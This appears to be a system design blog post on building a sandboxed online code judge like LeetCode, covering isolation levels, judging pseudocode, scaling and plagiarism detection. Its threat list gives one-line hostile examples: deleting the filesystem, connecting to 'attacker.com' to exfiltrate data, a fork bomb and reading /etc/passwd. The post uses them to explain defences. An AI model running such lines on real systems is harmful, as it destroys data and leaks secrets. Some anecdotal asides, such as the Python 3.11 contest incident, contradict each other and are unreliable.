System Design: Online Code Judge — How LeetCode Runs Your Code Safely at Scale

Series System Design: Web Scenarios — Online Code Judge

LeetCode processes over
1 million code submissions
per day at peak contest
times. Running untrusted
code at that scale is
a hard security problem.

You get the question in the interview: “Design an online code judge like LeetCode.” Users submit Python, Java, C++, or JavaScript. The system compiles and runs their code against hidden test cases. It returns: Accepted, Wrong Answer, Time Limit Exceeded, Memory Limit Exceeded, or Runtime Error. And it must handle malicious code safely.

This post works through the problem from first principles — from naive process spawning all the way to production-grade container sandboxing, queue-based judging, and scaling to millions of submissions.


1. The core challenge: untrusted code execution

Running arbitrary user code is extremely dangerous. Consider what a malicious user could submit:

Attack vectors in user-submitted code
  • import os; os.system("rm -rf /") — destroy the filesystem
  • while True: pass — infinite loop, CPU starvation
  • x = [0] * (10**12) — allocate 8 TB, crash the machine
  • import socket; socket.connect(("attacker.com", 443)) — exfiltrate data
  • import os; os.fork() repeated — fork bomb, exhaust process table
  • open("/etc/passwd", "r").read() — read host secrets

The system must be completely sandboxed: every submission runs in an isolated environment where it cannot harm the host system, other users, or the network.

The fundamental tension: you want fast execution (users hate waiting 10 seconds for results) but strong isolation (you cannot trust the code). These goals are in opposition — stronger sandboxing generally means more overhead.

2. Sandbox approaches (progressive)

🔒 Sandbox Level Explorer

Level 1 — Process-level isolation

Spawn the user's code as a child process with a timeout. Simple and fast — but extremely weak. The process still runs as a system user with access to the full filesystem and network.

subprocess.run(["python3", "solution.py"], timeout=5, capture_output=True)
CPU time limit (timeout)
Filesystem access (rm -rf /)
Network access
Memory exhaustion
Reading /etc/passwd
Fork bomb
Level 2 — chroot jail

Change the root directory for the process. The sandboxed process sees only a minimal directory tree — it cannot reach /etc, /home, or other host paths. Better, but shares the host kernel — a kernel exploit escapes the jail entirely.

CPU time limit
Filesystem access (mostly)
Network access
Memory exhaustion
Kernel exploits
Fork bomb
Level 3 — Docker containers

Full Linux namespace isolation: filesystem, network, PID, user namespaces. Combined with cgroup resource limits. Each submission gets a fresh container that is destroyed after execution. This is production-viable for most judges.

docker run --rm \
--network none \
--memory 256m \
--cpus 0.5 \
--read-only \
--pids-limit 64 \
judge-runner:latest python3 solution.py
CPU limit (--cpus)
Filesystem isolation
Network isolation (--network none)
Memory limit (--memory)
Fork bomb (--pids-limit)
⚠️Kernel exploits (shared kernel)
Level 4 — gVisor / Firecracker microVMs

gVisor implements a Linux-compatible kernel in Go running entirely in userspace. Syscalls from the sandboxed process go to gVisor's kernel, not the host kernel — a kernel exploit only escapes into gVisor, which is isolated. Firecracker (used by AWS Lambda) boots a full microVM in ~125ms using KVM hardware virtualization. Maximum isolation at near-container overhead.

CPU limit
Filesystem isolation
Network isolation
Memory limit
Fork bomb
Kernel exploits (intercepted)

Sandbox in action

Malicious code (pre-loaded)
Execution log
Click "Run without sandbox" or "Run in Docker" to simulate execution.

3. System architecture

The submission flows through seven stages before a verdict reaches the user.

🏗️ Submission Pipeline — click each stage

🌐 Stage 1: Browser
User writes code in the online editor (Monaco or CodeMirror). On "Submit", the browser sends a POST request with the code, selected language, and problem ID. The browser then starts polling for the verdict — or opens a WebSocket for push notification.

Payload: { "code": "...", "language": "python3", "problemId": 42, "userId": "u_abc" }

4. Test case execution

“Special judge” programs
are used when a problem
has multiple valid answers
— e.g. any valid graph
topological sort. The
special judge checks
correctness rather than
exact string equality.

For each test case the judge follows a strict loop:

Judge Worker — pseudocode
function judgeSubmission(submission, testCases):
  results = []
  for tc in testCases:
    container = spawnSandbox(submission.language)
    injectCode(container, submission.code)
    
    startTime  = clock()
    startMem   = cgroupMemUsage(container)
    
    proc = runInContainer(container, stdin=tc.input, timeout=tc.timeLimit)
    
    elapsed    = clock() - startTime
    peakMem    = cgroupPeakMem(container) - startMem
    exitCode   = proc.exitCode
    stdout     = proc.stdout
    
    destroyContainer(container)   // always, even on crash
    
    if proc.timedOut:
      results.append({ status: "TLE", tc: tc.id })
    elif peakMem > tc.memLimit:
      results.append({ status: "MLE", tc: tc.id })
    elif exitCode != 0:
      results.append({ status: "RE",  tc: tc.id, exitCode })
    elif tc.specialJudge:
      ok = runSpecialJudge(tc, stdout)
      results.append({ status: ok ? "AC" : "WA", tc: tc.id })
    elif normalize(stdout) != normalize(tc.expected):
      results.append({ status: "WA", tc: tc.id, got: stdout })
    else:
      results.append({ status: "AC", tc: tc.id, time: elapsed, mem: peakMem })
    
    if results.last.status != "AC":
      break   // early exit on first failure
  
  return summarize(results)

Measuring resource usage accurately:

  • Wall time: measured by the host using clock_gettime(CLOCK_REALTIME) around wait4() — not self-reported by the process
  • CPU time: read from cgroup cpuacct.usage after execution — isolates pure compute time from I/O waits
  • Peak memory: read from cgroup memory.max_usage_in_bytes — the high-water mark during the entire run
  • Output comparison: trim trailing whitespace, normalize line endings — many wrong answer bugs are whitespace issues

Special judges are separate programs that receive (input, expected_output, actual_output) and print OK or WRONG. Used for floating-point problems (accept output within 1e-6), multiple valid answers, or problems where the checker needs to verify a mathematical property.


5. Language-specific considerations

Python is 10–100× slower
than C++ for the same
algorithm. LeetCode gives
Python 5× more time than
C++ to make the judge
fair across languages.

Each language has unique sandboxing requirements and performance characteristics:

Language Time multiplier Memory limit Compilation Key sandbox flags
C++ 1× (baseline) 256 MB g++ -O2 -fsanitize=address,undefined --read-only, seccomp profile
Java 2× (JVM warmup) 512 MB (JVM heap) javac, then java -Xmx256m SecurityManager, no exec()
Python 5× (interpreter) 256 MB none (interpreted) restrict os, subprocess, socket modules
JavaScript 256 MB none (Node.js) --no-experimental-fetch, block fs.writeFile

C++ — The most dangerous language to sandbox. Users can call system(), exec(), open arbitrary file descriptors. Mitigations:

  • Compile with -fsanitize=address,undefined to catch memory errors early
  • Apply a seccomp (secure computing) filter to allow only specific syscalls: read, write, exit, basic math — block execve, fork, socket
  • Strip the binary after compilation to remove debug symbols

Java — The JVM takes 200–300ms to warm up. Subtract this from the measured time. Use -Xmx256m -Xms32m to control heap. The JVM’s built-in SecurityManager (deprecated in Java 17, removed in 21 — use a custom ClassLoader restriction) can block file I/O and network calls.

Python — Restrict dangerous modules via a custom import hook or by deleting them from sys.modules. Running inside a Docker container with --read-only already prevents filesystem writes. The resource module can set RLIMIT_CPU and RLIMIT_AS from inside the process.

JavaScript (Node.js) — Node 18+ supports the --permission flag to disable filesystem write access and network. Older versions: override require('fs').writeFile and require('net').connect in a wrapper script loaded with --require.


6. Plagiarism detection

MOSS (Measure of Software
Similarity) was created at
Stanford in 1994 and is
still the gold standard
for academic plagiarism
detection. It uses
Winnowing fingerprinting.

Plagiarism detection runs asynchronously — it is not in the critical path of judging. After a submission is accepted, a background job compares it against other accepted solutions for the same problem.

Three approaches, increasing sophistication:

Token-based comparison — tokenize the code (strip variable names, map all identifiers to a canonical form), then compare token sequences using similarity metrics like Jaccard similarity or edit distance. Fast but fooled by variable renaming.

AST comparison — parse both programs to their Abstract Syntax Trees, then compare tree structure. Variable names are ignored. Reordering statements that are independent may fool this. Used by tools like JPlag.

MOSS fingerprinting — select representative substrings (k-grams) from the program using the Winnowing algorithm, hash them, compare hash sets across submissions. Robust to reformatting, variable renaming, and statement reordering. The classic choice.

Practical pipeline:
  1. Submission accepted → enqueue plagiarism job (low priority queue)
  2. Normalize code: strip comments, whitespace, rename variables to v1, v2...
  3. Compute MOSS fingerprint
  4. Compare against top-50 accepted solutions (by runtime similarity)
  5. If similarity > 85% → flag for human review
  6. Human reviewer confirms or dismisses the flag
Important: plagiarism detection is probabilistic and generates false positives. Many short solutions to the same problem are legitimately identical (there is only one way to write Two Sum with a hash map). Always have human review before taking action.

7. Scaling

~500
Judge Workers (peak)
~100
Submissions / second
200ms
Warm container start

Judge Worker pool — autoscale on queue depth:

The queue depth (number of pending jobs) is the primary scaling signal. With Kubernetes HPA and a custom metrics adapter:

  • Queue depth > 50 → scale up workers
  • Queue depth < 5 for 5 minutes → scale down

Each worker handles one submission at a time. At ~2s average execution time and 100 submissions/second, you need ~200 workers at steady state — with headroom to ~500 for contest bursts.

Warm container pool:

Cold-starting a Docker container takes 1–3 seconds (pulling layers, initializing the runtime). During peak load, this adds noticeable latency. Solution: maintain a pool of pre-started containers per language:

  • Worker picks up a warm container instead of cold-starting
  • Container is destroyed after one use (fresh container = no state leakage)
  • A separate pool manager continuously refills the warm pool

Container reuse (for trusted languages):

For JavaScript with a locked-down runtime, the container can be reused across submissions. Between submissions: reset the sandbox directory, reload the Node.js process. ~50ms reset vs ~200ms cold start. Used only when the language runtime can be reliably reset.

Warm Container Pool — pseudocode
class WarmPool:
  def __init__(self, language, target_size=10):
    self.language    = language
    self.target_size = target_size
    self.pool        = Queue()
    self._refill_loop()

  async def _refill_loop(self):
    while True:
      while self.pool.size() < self.target_size:
        c = await startContainer(self.language)
        self.pool.put(c)
      await sleep(100)  // check every 100ms

  async def acquire(self):
    if self.pool.empty():
      return await startContainer(self.language)  // cold start fallback
    return self.pool.get()

  def release(self, container):
    destroyContainer(container)  // never return to pool — single use

Geographic placement:

Judge workers should run in the same region as the users. A submission from a user in Singapore that is judged in Virginia has 150ms of network RTT added to the wait time — for a fast algorithm that finishes in 50ms, that is the dominant latency. Use CDN routing and regional worker deployments.


8. Interactive code judge demo

⚡ Mini Code Judge — try it

Problem: Given an array of integers, return their sum. Input: space-separated integers. Output: a single integer.

Scenario
Language
Test cases
TC #1
1 2 3 → 6
TC #2
10 -5 → 5
TC #3
0 0 0 → 0
TC #4
100 → 100
TC #5
-1 -2 -3 → -6
Waiting for submission...

9. Capacity estimate

MetricValue
Submissions / day (LeetCode scale)~1 million
Peak submissions / second (contest)~100 / sec
Average execution time per submission~1–2 seconds
Judge workers needed (steady state)~200
Judge workers needed (peak burst)~500
Warm container pool size (per language)~50 containers
Container boot time (warm pool)~180–220 ms
Container boot time (cold start)~1.5–3 seconds
Code storage per submission (compressed)~5 KB avg
Total code storage per year~1.8 TB (1M/day × 365 × 5KB)
Result storage per submission~1 KB (verdict + per-test stats)
Total result storage per year~365 GB
Queue message size~2 KB (code + metadata)
Network bandwidth (queue + DB)~5 MB/s at peak
Scaling rule of thumb: (peak submissions/sec) × (avg execution time in seconds) = workers needed. At 100/sec × 2s average = 200 workers at steady state. Add 2.5× headroom for burst = 500 workers. Each worker is a single container, so this is 500 containers worth of CPU — roughly 250 vCPUs at 0.5 CPU per container.

Summary: system design checklist

Online Code Judge — key decisions
Sandbox Docker with --network none, --memory, --read-only, --pids-limit + seccomp profile
Queue Redis Streams or AWS SQS — durable, at-least-once delivery, dead-letter queue for failures
Result delivery WebSocket push via Redis pub/sub; polling as fallback
Time measurement Host-side wall clock + cgroup cpuacct.usage — never trust self-reported time
Memory measurement cgroup memory.max_usage_in_bytes — peak high-water mark
Cold start latency Pre-warm container pool of ~50 containers per language
Autoscaling Kubernetes HPA on queue depth metric — scale up fast, scale down slow
Higher isolation gVisor (runsc) for maximum security; Firecracker microVMs for VM-level isolation

LeetCode runs on AWS.
Their judging infrastructure
uses a combination of ECS
(Elastic Container Service)
and custom-built judge
workers. The company
processes over 1 million
code submissions per day
at peak contest times.

LeetCode’s infrastructure runs on Amazon ECS. Their judge workers are custom-built containers that receive jobs from an internal queue. At peak contest times — when tens of thousands of participants submit simultaneously — the queue acts as a buffer, absorbing burst load that would overwhelm a synchronous system. The warm container pool keeps perceived latency low even when the queue is deep: you wait for a worker, but once a worker picks up your job, the container is ready immediately.

The 2022 LeetCode Weekly
Contest had a famous
incident: a Python solution
that should have TLE’d
was accepted because
Python 3.11 optimizations
made an O(n³) solution
fast enough. The community
debated the validity
for days.

The strictness of judging matters enormously for competitive programming. A 2022 incident: Python 3.11 introduced significant performance improvements (the “Faster CPython” project). Solutions that were accepted for years suddenly started failing after a Python version upgrade — and some O(n²) solutions that should have timed out started passing. Maintaining separate per-language time limits that account for interpreter version performance is a continuous maintenance burden.

gVisor (used by Google
Cloud Run and App Engine)
implements a Linux kernel
in Go running in userspace.
Syscalls from the sandboxed
process go to gVisor’s
kernel — even if the
process exploits a kernel
bug, it exploits gVisor,
not the host OS kernel.

gVisor’s approach is elegant: instead of letting user processes talk to the Linux kernel directly (with all its exploitable surface area), gVisor interposes a userspace kernel. Every syscall from the sandboxed process is handled by gVisor’s Sentry component, written in Go, which either handles it internally or translates it to a safe subset of host syscalls. The attack surface shrinks from the entire Linux kernel to gVisor’s much smaller, memory-safe Go implementation. Google Cloud Run and Cloud Functions run on gVisor — it is production-hardened at planetary scale.